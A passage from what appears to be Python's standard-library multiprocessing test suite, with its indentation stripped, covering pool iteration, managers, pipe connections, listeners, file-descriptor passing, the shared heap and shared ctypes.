it = self.pool.imap(sqr, list(range(1000)), chunksize=100)
for i in range(1000):
self.assertEqual(next(it), i*i)
self.assertRaises(StopIteration, it.__next__)
def test_imap_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# SayWhenError seen at the very first of the iterable
it = self.pool.imap(sqr, exception_throwing_generator(1, -1), 1)
self.assertRaises(SayWhenError, it.__next__)
# again, make sure it's reentrant
it = self.pool.imap(sqr, exception_throwing_generator(1, -1), 1)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap(sqr, exception_throwing_generator(10, 3), 1)
for i in range(3):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
# SayWhenError seen at start of problematic chunk's results
it = self.pool.imap(sqr, exception_throwing_generator(20, 7), 2)
for i in range(6):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap(sqr, exception_throwing_generator(20, 7), 4)
for i in range(4):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
def test_imap_unordered(self):
it = self.pool.imap_unordered(sqr, list(range(10)))
self.assertEqual(sorted(it), list(map(sqr, list(range(10)))))
it = self.pool.imap_unordered(sqr, list(range(1000)), chunksize=100)
self.assertEqual(sorted(it), list(map(sqr, list(range(1000)))))
def test_imap_unordered_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# SayWhenError seen at the very first of the iterable
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(1, -1),
1)
self.assertRaises(SayWhenError, it.__next__)
# again, make sure it's reentrant
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(1, -1),
1)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(10, 3),
1)
expected_values = list(map(sqr, list(range(10))))
with self.assertRaises(SayWhenError):
# imap_unordered makes it difficult to anticipate the SayWhenError
for i in range(10):
value = next(it)
self.assertIn(value, expected_values)
expected_values.remove(value)
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(20, 7),
2)
expected_values = list(map(sqr, list(range(20))))
with self.assertRaises(SayWhenError):
for i in range(20):
value = next(it)
self.assertIn(value, expected_values)
expected_values.remove(value)
def test_make_pool(self):
expected_error = (RemoteError if self.TYPE == 'manager'
else ValueError)
self.assertRaises(expected_error, self.Pool, -1)
self.assertRaises(expected_error, self.Pool, 0)
if self.TYPE != 'manager':
p = self.Pool(3)
try:
self.assertEqual(3, len(p._pool))
finally:
p.close()
p.join()
def test_terminate(self):
result = self.pool.map_async(
time.sleep, [0.1 for i in range(10000)], chunksize=1
)
self.pool.terminate()
join = TimingWrapper(self.pool.join)
join()
# Sanity check the pool didn't wait for all tasks to finish
self.assertLess(join.elapsed, 2.0)
def test_empty_iterable(self):
# See Issue 12157
p = self.Pool(1)
self.assertEqual(p.map(sqr, []), [])
self.assertEqual(list(p.imap(sqr, [])), [])
self.assertEqual(list(p.imap_unordered(sqr, [])), [])
self.assertEqual(p.map_async(sqr, []).get(), [])
p.close()
p.join()
def test_context(self):
if self.TYPE == 'processes':
L = list(range(10))
expected = [sqr(i) for i in L]
with self.Pool(2) as p:
r = p.map_async(sqr, L)
self.assertEqual(r.get(), expected)
p.join()
self.assertRaises(ValueError, p.map_async, sqr, L)
@classmethod
def _test_traceback(cls):
raise RuntimeError(123) # some comment
def test_traceback(self):
# We want ensure that the traceback from the child process is
# contained in the traceback raised in the main process.
if self.TYPE == 'processes':
with self.Pool(1) as p:
try:
p.apply(self._test_traceback)
except Exception as e:
exc = e
else:
self.fail('expected RuntimeError')
p.join()
self.assertIs(type(exc), RuntimeError)
self.assertEqual(exc.args, (123,))
cause = exc.__cause__
self.assertIs(type(cause), multiprocessing.pool.RemoteTraceback)
self.assertIn('raise RuntimeError(123) # some comment', cause.tb)
with test.support.captured_stderr() as f1:
try:
raise exc
except RuntimeError:
sys.excepthook(*sys.exc_info())
self.assertIn('raise RuntimeError(123) # some comment',
f1.getvalue())
# _helper_reraises_exception should not make the error
# a remote exception
with self.Pool(1) as p:
try:
p.map(sqr, exception_throwing_generator(1, -1), 1)
except Exception as e:
exc = e
else:
self.fail('expected SayWhenError')
self.assertIs(type(exc), SayWhenError)
self.assertIs(exc.__cause__, None)
p.join()
@classmethod
def _test_wrapped_exception(cls):
raise RuntimeError('foo')
def test_wrapped_exception(self):
# Issue #20980: Should not wrap exception when using thread pool
with self.Pool(1) as p:
with self.assertRaises(RuntimeError):
p.apply(self._test_wrapped_exception)
p.join()
def test_map_no_failfast(self):
# Issue #23992: the fail-fast behaviour when an exception is raised
# during map() would make Pool.join() deadlock, because a worker
# process would fill the result queue (after the result handler thread
# terminated, hence not draining it anymore).
t_start = time.monotonic()
with self.assertRaises(ValueError):
with self.Pool(2) as p:
try:
p.map(raise_large_valuerror, [0, 1])
finally:
time.sleep(0.5)
p.close()
p.join()
# check that we indeed waited for all jobs
self.assertGreater(time.monotonic() - t_start, 0.9)
def test_release_task_refs(self):
# Issue #29861: task arguments and results should not be kept
# alive after we are done with them.
objs = [CountedObject() for i in range(10)]
refs = [weakref.ref(o) for o in objs]
self.pool.map(identity, objs)
del objs
time.sleep(DELTA) # let threaded cleanup code run
self.assertEqual(set(wr() for wr in refs), {None})
# With a process pool, copies of the objects are returned, check
# they were released too.
self.assertEqual(CountedObject.n_instances, 0)
def test_enter(self):
if self.TYPE == 'manager':
self.skipTest("test not applicable to manager")
pool = self.Pool(1)
with pool:
pass
# call pool.terminate()
# pool is no longer running
with self.assertRaises(ValueError):
# bpo-35477: pool.__enter__() fails if the pool is not running
with pool:
pass
pool.join()
def test_resource_warning(self):
if self.TYPE == 'manager':
self.skipTest("test not applicable to manager")
pool = self.Pool(1)
pool.terminate()
pool.join()
# force state to RUN to emit ResourceWarning in __del__()
pool._state = multiprocessing.pool.RUN
with support.check_warnings(('unclosed running multiprocessing pool',
ResourceWarning)):
pool = None
support.gc_collect()
def raising():
raise KeyError("key")
def unpickleable_result():
return lambda: 42
class _TestPoolWorkerErrors(BaseTestCase):
ALLOWED_TYPES = ('processes', )
def test_async_error_callback(self):
p = multiprocessing.Pool(2)
scratchpad = [None]
def errback(exc):
scratchpad[0] = exc
res = p.apply_async(raising, error_callback=errback)
self.assertRaises(KeyError, res.get)
self.assertTrue(scratchpad[0])
self.assertIsInstance(scratchpad[0], KeyError)
p.close()
p.join()
def test_unpickleable_result(self):
from multiprocessing.pool import MaybeEncodingError
p = multiprocessing.Pool(2)
# Make sure we don't lose pool processes because of encoding errors.
for iteration in range(20):
scratchpad = [None]
def errback(exc):
scratchpad[0] = exc
res = p.apply_async(unpickleable_result, error_callback=errback)
self.assertRaises(MaybeEncodingError, res.get)
wrapped = scratchpad[0]
self.assertTrue(wrapped)
self.assertIsInstance(scratchpad[0], MaybeEncodingError)
self.assertIsNotNone(wrapped.exc)
self.assertIsNotNone(wrapped.value)
p.close()
p.join()
class _TestPoolWorkerLifetime(BaseTestCase):
ALLOWED_TYPES = ('processes', )
def test_pool_worker_lifetime(self):
p = multiprocessing.Pool(3, maxtasksperchild=10)
self.assertEqual(3, len(p._pool))
origworkerpids = [w.pid for w in p._pool]
# Run many tasks so each worker gets replaced (hopefully)
results = []
for i in range(100):
results.append(p.apply_async(sqr, (i, )))
# Fetch the results and verify we got the right answers,
# also ensuring all the tasks have completed.
for (j, res) in enumerate(results):
self.assertEqual(res.get(), sqr(j))
# Refill the pool
p._repopulate_pool()
# Wait until all workers are alive
# (countdown * DELTA = 5 seconds max startup process time)
countdown = 50
while countdown and not all(w.is_alive() for w in p._pool):
countdown -= 1
time.sleep(DELTA)
finalworkerpids = [w.pid for w in p._pool]
# All pids should be assigned. See issue #7805.
self.assertNotIn(None, origworkerpids)
self.assertNotIn(None, finalworkerpids)
# Finally, check that the worker pids have changed
self.assertNotEqual(sorted(origworkerpids), sorted(finalworkerpids))
p.close()
p.join()
def test_pool_worker_lifetime_early_close(self):
# Issue #10332: closing a pool whose workers have limited lifetimes
# before all the tasks completed would make join() hang.
p = multiprocessing.Pool(3, maxtasksperchild=1)
results = []
for i in range(6):
results.append(p.apply_async(sqr, (i, 0.3)))
p.close()
p.join()
# check the results
for (j, res) in enumerate(results):
self.assertEqual(res.get(), sqr(j))
def test_worker_finalization_via_atexit_handler_of_multiprocessing(self):
# tests cases against bpo-38744 and bpo-39360
cmd = '''if 1:
from multiprocessing import Pool
problem = None
class A:
def __init__(self):
self.pool = Pool(processes=1)
def test():
global problem
problem = A()
problem.pool.map(float, tuple(range(10)))
if __name__ == "__main__":
test()
'''
rc, out, err = test.support.script_helper.assert_python_ok('-c', cmd)
self.assertEqual(rc, 0)
#
# Test of creating a customized manager class
#
from multiprocessing.managers import BaseManager, BaseProxy, RemoteError
class FooBar(object):
def f(self):
return 'f()'
def g(self):
raise ValueError
def _h(self):
return '_h()'
def baz():
for i in range(10):
yield i*i
class IteratorProxy(BaseProxy):
_exposed_ = ('__next__',)
def __iter__(self):
return self
def __next__(self):
return self._callmethod('__next__')
class MyManager(BaseManager):
pass
MyManager.register('Foo', callable=FooBar)
MyManager.register('Bar', callable=FooBar, exposed=('f', '_h'))
MyManager.register('baz', callable=baz, proxytype=IteratorProxy)
class _TestMyManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_mymanager(self):
manager = MyManager()
manager.start()
self.common(manager)
manager.shutdown()
# bpo-30356: BaseManager._finalize_manager() sends SIGTERM
# to the manager process if it takes longer than 1 second to stop,
# which happens on slow buildbots.
self.assertIn(manager._process.exitcode, (0, -signal.SIGTERM))
def test_mymanager_context(self):
with MyManager() as manager:
self.common(manager)
# bpo-30356: BaseManager._finalize_manager() sends SIGTERM
# to the manager process if it takes longer than 1 second to stop,
# which happens on slow buildbots.
self.assertIn(manager._process.exitcode, (0, -signal.SIGTERM))
def test_mymanager_context_prestarted(self):
manager = MyManager()
manager.start()
with manager:
self.common(manager)
self.assertEqual(manager._process.exitcode, 0)
def common(self, manager):
foo = manager.Foo()
bar = manager.Bar()
baz = manager.baz()
foo_methods = [name for name in ('f', 'g', '_h') if hasattr(foo, name)]
bar_methods = [name for name in ('f', 'g', '_h') if hasattr(bar, name)]
self.assertEqual(foo_methods, ['f', 'g'])
self.assertEqual(bar_methods, ['f', '_h'])
self.assertEqual(foo.f(), 'f()')
self.assertRaises(ValueError, foo.g)
self.assertEqual(foo._callmethod('f'), 'f()')
self.assertRaises(RemoteError, foo._callmethod, '_h')
self.assertEqual(bar.f(), 'f()')
self.assertEqual(bar._h(), '_h()')
self.assertEqual(bar._callmethod('f'), 'f()')
self.assertEqual(bar._callmethod('_h'), '_h()')
self.assertEqual(list(baz), [i*i for i in range(10)])
#
# Test of connecting to a remote server and using xmlrpclib for serialization
#
_queue = pyqueue.Queue()
def get_queue():
return _queue
class QueueManager(BaseManager):
'''manager class used by server process'''
QueueManager.register('get_queue', callable=get_queue)
class QueueManager2(BaseManager):
'''manager class which specifies the same interface as QueueManager'''
QueueManager2.register('get_queue')
SERIALIZER = 'xmlrpclib'
class _TestRemoteManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
values = ['hello world', None, True, 2.25,
'hall\xe5 v\xe4rlden',
'\u043f\u0440\u0438\u0432\u0456\u0442 \u0441\u0432\u0456\u0442',
b'hall\xe5 v\xe4rlden',
]
result = values[:]
@classmethod
def _putter(cls, address, authkey):
manager = QueueManager2(
address=address, authkey=authkey, serializer=SERIALIZER
)
manager.connect()
queue = manager.get_queue()
# Note that xmlrpclib will deserialize object as a list not a tuple
queue.put(tuple(cls.values))
def test_remote(self):
authkey = os.urandom(32)
manager = QueueManager(
address=(socket_helper.HOST, 0), authkey=authkey, serializer=SERIALIZER
)
manager.start()
self.addCleanup(manager.shutdown)
p = self.Process(target=self._putter, args=(manager.address, authkey))
p.daemon = True
p.start()
manager2 = QueueManager2(
address=manager.address, authkey=authkey, serializer=SERIALIZER
)
manager2.connect()
queue = manager2.get_queue()
self.assertEqual(queue.get(), self.result)
# Because we are using xmlrpclib for serialization instead of
# pickle this will cause a serialization error.
self.assertRaises(Exception, queue.put, time.sleep)
# Make queue finalizer run before the server is stopped
del queue
@hashlib_helper.requires_hashdigest('md5')
class _TestManagerRestart(BaseTestCase):
@classmethod
def _putter(cls, address, authkey):
manager = QueueManager(
address=address, authkey=authkey, serializer=SERIALIZER)
manager.connect()
queue = manager.get_queue()
queue.put('hello world')
def test_rapid_restart(self):
authkey = os.urandom(32)
manager = QueueManager(
address=(socket_helper.HOST, 0), authkey=authkey, serializer=SERIALIZER)
try:
srvr = manager.get_server()
addr = srvr.address
# Close the connection.Listener socket which gets opened as a part
# of manager.get_server(). It's not needed for the test.
srvr.listener.close()
manager.start()
p = self.Process(target=self._putter, args=(manager.address, authkey))
p.start()
p.join()
queue = manager.get_queue()
self.assertEqual(queue.get(), 'hello world')
del queue
finally:
if hasattr(manager, "shutdown"):
manager.shutdown()
manager = QueueManager(
address=addr, authkey=authkey, serializer=SERIALIZER)
try:
manager.start()
self.addCleanup(manager.shutdown)
except OSError as e:
if e.errno != errno.EADDRINUSE:
raise
# Retry after some time, in case the old socket was lingering
# (sporadic failure on buildbots)
time.sleep(1.0)
manager = QueueManager(
address=addr, authkey=authkey, serializer=SERIALIZER)
if hasattr(manager, "shutdown"):
self.addCleanup(manager.shutdown)
#
#
#
SENTINEL = latin('')
class _TestConnection(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
@classmethod
def _echo(cls, conn):
for msg in iter(conn.recv_bytes, SENTINEL):
conn.send_bytes(msg)
conn.close()
def test_connection(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.daemon = True
p.start()
seq = [1, 2.25, None]
msg = latin('hello world')
longmsg = msg * 10
arr = array.array('i', list(range(4)))
if self.TYPE == 'processes':
self.assertEqual(type(conn.fileno()), int)
self.assertEqual(conn.send(seq), None)
self.assertEqual(conn.recv(), seq)
self.assertEqual(conn.send_bytes(msg), None)
self.assertEqual(conn.recv_bytes(), msg)
if self.TYPE == 'processes':
buffer = array.array('i', [0]*10)
expected = list(arr) + [0] * (10 - len(arr))
self.assertEqual(conn.send_bytes(arr), None)
self.assertEqual(conn.recv_bytes_into(buffer),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = array.array('i', [0]*10)
expected = [0] * 3 + list(arr) + [0] * (10 - 3 - len(arr))
self.assertEqual(conn.send_bytes(arr), None)
self.assertEqual(conn.recv_bytes_into(buffer, 3 * buffer.itemsize),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = bytearray(latin(' ' * 40))
self.assertEqual(conn.send_bytes(longmsg), None)
try:
res = conn.recv_bytes_into(buffer)
except multiprocessing.BufferTooShort as e:
self.assertEqual(e.args, (longmsg,))
else:
self.fail('expected BufferTooShort, got %s' % res)
poll = TimingWrapper(conn.poll)
self.assertEqual(poll(), False)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(poll(-1), False)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(poll(TIMEOUT1), False)
self.assertTimingAlmostEqual(poll.elapsed, TIMEOUT1)
conn.send(None)
time.sleep(.1)
self.assertEqual(poll(TIMEOUT1), True)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(conn.recv(), None)
really_big_msg = latin('X') * (1024 * 1024 * 16) # 16Mb
conn.send_bytes(really_big_msg)
self.assertEqual(conn.recv_bytes(), really_big_msg)
conn.send_bytes(SENTINEL) # tell child to quit
child_conn.close()
if self.TYPE == 'processes':
self.assertEqual(conn.readable, True)
self.assertEqual(conn.writable, True)
self.assertRaises(EOFError, conn.recv)
self.assertRaises(EOFError, conn.recv_bytes)
p.join()
def test_duplex_false(self):
reader, writer = self.Pipe(duplex=False)
self.assertEqual(writer.send(1), None)
self.assertEqual(reader.recv(), 1)
if self.TYPE == 'processes':
self.assertEqual(reader.readable, True)
self.assertEqual(reader.writable, False)
self.assertEqual(writer.readable, False)
self.assertEqual(writer.writable, True)
self.assertRaises(OSError, reader.send, 2)
self.assertRaises(OSError, writer.recv)
self.assertRaises(OSError, writer.poll)
def test_spawn_close(self):
# We test that a pipe connection can be closed by parent
# process immediately after child is spawned. On Windows this
# would have sometimes failed on old versions because
# child_conn would be closed before the child got a chance to
# duplicate it.
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.daemon = True
p.start()
child_conn.close() # this might complete before child initializes
msg = latin('hello')
conn.send_bytes(msg)
self.assertEqual(conn.recv_bytes(), msg)
conn.send_bytes(SENTINEL)
conn.close()
p.join()
def test_sendbytes(self):
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
msg = latin('abcdefghijklmnopqrstuvwxyz')
a, b = self.Pipe()
a.send_bytes(msg)
self.assertEqual(b.recv_bytes(), msg)
a.send_bytes(msg, 5)
self.assertEqual(b.recv_bytes(), msg[5:])
a.send_bytes(msg, 7, 8)
self.assertEqual(b.recv_bytes(), msg[7:7+8])
a.send_bytes(msg, 26)
self.assertEqual(b.recv_bytes(), latin(''))
a.send_bytes(msg, 26, 0)
self.assertEqual(b.recv_bytes(), latin(''))
self.assertRaises(ValueError, a.send_bytes, msg, 27)
self.assertRaises(ValueError, a.send_bytes, msg, 22, 5)
self.assertRaises(ValueError, a.send_bytes, msg, 26, 1)
self.assertRaises(ValueError, a.send_bytes, msg, -1)
self.assertRaises(ValueError, a.send_bytes, msg, 4, -1)
@classmethod
def _is_fd_assigned(cls, fd):
try:
os.fstat(fd)
except OSError as e:
if e.errno == errno.EBADF:
return False
raise
else:
return True
@classmethod
def _writefd(cls, conn, data, create_dummy_fds=False):
if create_dummy_fds:
for i in range(0, 256):
if not cls._is_fd_assigned(i):
os.dup2(conn.fileno(), i)
fd = reduction.recv_handle(conn)
if msvcrt:
fd = msvcrt.open_osfhandle(fd, os.O_WRONLY)
os.write(fd, data)
os.close(fd)
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
def test_fd_transfer(self):
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._writefd, args=(child_conn, b"foo"))
p.daemon = True
p.start()
self.addCleanup(test.support.unlink, test.support.TESTFN)
with open(test.support.TESTFN, "wb") as f:
fd = f.fileno()
if msvcrt:
fd = msvcrt.get_osfhandle(fd)
reduction.send_handle(conn, fd, p.pid)
p.join()
with open(test.support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"foo")
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@unittest.skipIf(sys.platform == "win32",
"test semantics don't make sense on Windows")
@unittest.skipIf(MAXFD <= 256,
"largest assignable fd number is too small")
@unittest.skipUnless(hasattr(os, "dup2"),
"test needs os.dup2()")
def test_large_fd_transfer(self):
# With fd > 256 (issue #11657)
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._writefd, args=(child_conn, b"bar", True))
p.daemon = True
p.start()
self.addCleanup(test.support.unlink, test.support.TESTFN)
with open(test.support.TESTFN, "wb") as f:
fd = f.fileno()
for newfd in range(256, MAXFD):
if not self._is_fd_assigned(newfd):
break
else:
self.fail("could not find an unassigned large file descriptor")
os.dup2(fd, newfd)
try:
reduction.send_handle(conn, newfd, p.pid)
finally:
os.close(newfd)
p.join()
with open(test.support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"bar")
@classmethod
def _send_data_without_fd(self, conn):
os.write(conn.fileno(), b"\0")
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@unittest.skipIf(sys.platform == "win32", "doesn't make sense on Windows")
def test_missing_fd_transfer(self):
# Check that exception is raised when received data is not
# accompanied by a file descriptor in ancillary data.
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._send_data_without_fd, args=(child_conn,))
p.daemon = True
p.start()
self.assertRaises(RuntimeError, reduction.recv_handle, conn)
p.join()
def test_context(self):
a, b = self.Pipe()
with a, b:
a.send(1729)
self.assertEqual(b.recv(), 1729)
if self.TYPE == 'processes':
self.assertFalse(a.closed)
self.assertFalse(b.closed)
if self.TYPE == 'processes':
self.assertTrue(a.closed)
self.assertTrue(b.closed)
self.assertRaises(OSError, a.recv)
self.assertRaises(OSError, b.recv)
class _TestListener(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_multiple_bind(self):
for family in self.connection.families:
l = self.connection.Listener(family=family)
self.addCleanup(l.close)
self.assertRaises(OSError, self.connection.Listener,
l.address, family)
def test_context(self):
with self.connection.Listener() as l:
with self.connection.Client(l.address) as c:
with l.accept() as d:
c.send(1729)
self.assertEqual(d.recv(), 1729)
if self.TYPE == 'processes':
self.assertRaises(OSError, l.accept)
@unittest.skipUnless(util.abstract_sockets_supported,
"test needs abstract socket support")
def test_abstract_socket(self):
with self.connection.Listener("\0something") as listener:
with self.connection.Client(listener.address) as client:
with listener.accept() as d:
client.send(1729)
self.assertEqual(d.recv(), 1729)
if self.TYPE == 'processes':
self.assertRaises(OSError, listener.accept)
class _TestListenerClient(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
@classmethod
def _test(cls, address):
conn = cls.connection.Client(address)
conn.send('hello')
conn.close()
def test_listener_client(self):
for family in self.connection.families:
l = self.connection.Listener(family=family)
p = self.Process(target=self._test, args=(l.address,))
p.daemon = True
p.start()
conn = l.accept()
self.assertEqual(conn.recv(), 'hello')
p.join()
l.close()
def test_issue14725(self):
l = self.connection.Listener()
p = self.Process(target=self._test, args=(l.address,))
p.daemon = True
p.start()
time.sleep(1)
# On Windows the client process should by now have connected,
# written data and closed the pipe handle by now. This causes
# ConnectNamdedPipe() to fail with ERROR_NO_DATA. See Issue
# 14725.
conn = l.accept()
self.assertEqual(conn.recv(), 'hello')
conn.close()
p.join()
l.close()
def test_issue16955(self):
for fam in self.connection.families:
l = self.connection.Listener(family=fam)
c = self.connection.Client(l.address)
a = l.accept()
a.send_bytes(b"hello")
self.assertTrue(c.poll(1))
a.close()
c.close()
l.close()
class _TestPoll(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def test_empty_string(self):
a, b = self.Pipe()
self.assertEqual(a.poll(), False)
b.send_bytes(b'')
self.assertEqual(a.poll(), True)
self.assertEqual(a.poll(), True)
@classmethod
def _child_strings(cls, conn, strings):
for s in strings:
time.sleep(0.1)
conn.send_bytes(s)
conn.close()
def test_strings(self):
strings = (b'hello', b'', b'a', b'b', b'', b'bye', b'', b'lop')
a, b = self.Pipe()
p = self.Process(target=self._child_strings, args=(b, strings))
p.start()
for s in strings:
for i in range(200):
if a.poll(0.01):
break
x = a.recv_bytes()
self.assertEqual(s, x)
p.join()
@classmethod
def _child_boundaries(cls, r):
# Polling may "pull" a message in to the child process, but we
# don't want it to pull only part of a message, as that would
# corrupt the pipe for any other processes which might later
# read from it.
r.poll(5)
def test_boundaries(self):
r, w = self.Pipe(False)
p = self.Process(target=self._child_boundaries, args=(r,))
p.start()
time.sleep(2)
L = [b"first", b"second"]
for obj in L:
w.send_bytes(obj)
w.close()
p.join()
self.assertIn(r.recv_bytes(), L)
@classmethod
def _child_dont_merge(cls, b):
b.send_bytes(b'a')
b.send_bytes(b'b')
b.send_bytes(b'cd')
def test_dont_merge(self):
a, b = self.Pipe()
self.assertEqual(a.poll(0.0), False)
self.assertEqual(a.poll(0.1), False)
p = self.Process(target=self._child_dont_merge, args=(b,))
p.start()
self.assertEqual(a.recv_bytes(), b'a')
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.recv_bytes(), b'b')
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(0.0), True)
self.assertEqual(a.recv_bytes(), b'cd')
p.join()
#
# Test of sending connection and socket objects between processes
#
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@hashlib_helper.requires_hashdigest('md5')
class _TestPicklingConnections(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def tearDownClass(cls):
from multiprocessing import resource_sharer
resource_sharer.stop(timeout=support.LONG_TIMEOUT)
@classmethod
def _listener(cls, conn, families):
for fam in families:
l = cls.connection.Listener(family=fam)
conn.send(l.address)
new_conn = l.accept()
conn.send(new_conn)
new_conn.close()
l.close()
l = socket.create_server((socket_helper.HOST, 0))
conn.send(l.getsockname())
new_conn, addr = l.accept()
conn.send(new_conn)
new_conn.close()
l.close()
conn.recv()
@classmethod
def _remote(cls, conn):
for (address, msg) in iter(conn.recv, None):
client = cls.connection.Client(address)
client.send(msg.upper())
client.close()
address, msg = conn.recv()
client = socket.socket()
client.connect(address)
client.sendall(msg.upper())
client.close()
conn.close()
def test_pickling(self):
families = self.connection.families
lconn, lconn0 = self.Pipe()
lp = self.Process(target=self._listener, args=(lconn0, families))
lp.daemon = True
lp.start()
lconn0.close()
rconn, rconn0 = self.Pipe()
rp = self.Process(target=self._remote, args=(rconn0,))
rp.daemon = True
rp.start()
rconn0.close()
for fam in families:
msg = ('This connection uses family %s' % fam).encode('ascii')
address = lconn.recv()
rconn.send((address, msg))
new_conn = lconn.recv()
self.assertEqual(new_conn.recv(), msg.upper())
rconn.send(None)
msg = latin('This connection uses a normal socket')
address = lconn.recv()
rconn.send((address, msg))
new_conn = lconn.recv()
buf = []
while True:
s = new_conn.recv(100)
if not s:
break
buf.append(s)
buf = b''.join(buf)
self.assertEqual(buf, msg.upper())
new_conn.close()
lconn.send(None)
rconn.close()
lconn.close()
lp.join()
rp.join()
@classmethod
def child_access(cls, conn):
w = conn.recv()
w.send('all is well')
w.close()
r = conn.recv()
msg = r.recv()
conn.send(msg*2)
conn.close()
def test_access(self):
# On Windows, if we do not specify a destination pid when
# using DupHandle then we need to be careful to use the
# correct access flags for DuplicateHandle(), or else
# DupHandle.detach() will raise PermissionError. For example,
# for a read only pipe handle we should use
# access=FILE_GENERIC_READ. (Unfortunately
# DUPLICATE_SAME_ACCESS does not work.)
conn, child_conn = self.Pipe()
p = self.Process(target=self.child_access, args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
r, w = self.Pipe(duplex=False)
conn.send(w)
w.close()
self.assertEqual(r.recv(), 'all is well')
r.close()
r, w = self.Pipe(duplex=False)
conn.send(r)
r.close()
w.send('foobar')
w.close()
self.assertEqual(conn.recv(), 'foobar'*2)
p.join()
#
#
#
class _TestHeap(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
super().setUp()
# Make pristine heap for these tests
self.old_heap = multiprocessing.heap.BufferWrapper._heap
multiprocessing.heap.BufferWrapper._heap = multiprocessing.heap.Heap()
def tearDown(self):
multiprocessing.heap.BufferWrapper._heap = self.old_heap
super().tearDown()
def test_heap(self):
iterations = 5000
maxblocks = 50
blocks = []
# get the heap object
heap = multiprocessing.heap.BufferWrapper._heap
heap._DISCARD_FREE_SPACE_LARGER_THAN = 0
# create and destroy lots of blocks of different sizes
for i in range(iterations):
size = int(random.lognormvariate(0, 1) * 1000)
b = multiprocessing.heap.BufferWrapper(size)
blocks.append(b)
if len(blocks) > maxblocks:
i = random.randrange(maxblocks)
del blocks[i]
del b
# verify the state of the heap
with heap._lock:
all = []
free = 0
occupied = 0
for L in list(heap._len_to_seq.values()):
# count all free blocks in arenas
for arena, start, stop in L:
all.append((heap._arenas.index(arena), start, stop,
stop-start, 'free'))
free += (stop-start)
for arena, arena_blocks in heap._allocated_blocks.items():
# count all allocated blocks in arenas
for start, stop in arena_blocks:
all.append((heap._arenas.index(arena), start, stop,
stop-start, 'occupied'))
occupied += (stop-start)
self.assertEqual(free + occupied,
sum(arena.size for arena in heap._arenas))
all.sort()
for i in range(len(all)-1):
(arena, start, stop) = all[i][:3]
(narena, nstart, nstop) = all[i+1][:3]
if arena != narena:
# Two different arenas
self.assertEqual(stop, heap._arenas[arena].size) # last block
self.assertEqual(nstart, 0) # first block
else:
# Same arena: two adjacent blocks
self.assertEqual(stop, nstart)
# test free'ing all blocks
random.shuffle(blocks)
while blocks:
blocks.pop()
self.assertEqual(heap._n_frees, heap._n_mallocs)
self.assertEqual(len(heap._pending_free_blocks), 0)
self.assertEqual(len(heap._arenas), 0)
self.assertEqual(len(heap._allocated_blocks), 0, heap._allocated_blocks)
self.assertEqual(len(heap._len_to_seq), 0)
def test_free_from_gc(self):
# Check that freeing of blocks by the garbage collector doesn't deadlock
# (issue #12352).
# Make sure the GC is enabled, and set lower collection thresholds to
# make collections more frequent (and increase the probability of
# deadlock).
if not gc.isenabled():
gc.enable()
self.addCleanup(gc.disable)
thresholds = gc.get_threshold()
self.addCleanup(gc.set_threshold, *thresholds)
gc.set_threshold(10)
# perform numerous block allocations, with cyclic references to make
# sure objects are collected asynchronously by the gc
for i in range(5000):
a = multiprocessing.heap.BufferWrapper(1)
b = multiprocessing.heap.BufferWrapper(1)
# circular references
a.buddy = b
b.buddy = a
#
#
#
class _Foo(Structure):
_fields_ = [
('x', c_int),
('y', c_double),
('z', c_longlong,)
]
class _TestSharedCTypes(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
if not HAS_SHAREDCTYPES:
self.skipTest("requires multiprocessing.sharedctypes")
@classmethod
def _double(cls, x, y, z, foo, arr, string):
x.value *= 2
y.value *= 2
z.value *= 2
foo.x *= 2
foo.y *= 2
string.value *= 2
for i in range(len(arr)):
arr[i] *= 2
def test_sharedctypes(self, lock=False):
x = Value('i', 7, lock=lock)
